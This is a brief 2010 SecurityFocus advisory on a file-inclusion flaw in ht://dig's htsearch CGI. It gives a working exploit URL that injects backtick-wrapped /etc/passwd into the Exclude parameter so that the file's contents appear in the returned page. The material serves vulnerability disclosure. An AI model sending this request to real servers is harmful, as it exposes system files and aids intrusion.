ht://dig Arbitrary File Inclusion Vulnerability

The URL:
http ://target/cgi-bin/htsearch?Exclude=%60/etc/passwd%60
will return a page with the contents of /etc/passwd in the 'exclude' field.


 

Privacy Statement
Copyright 2010, SecurityFocus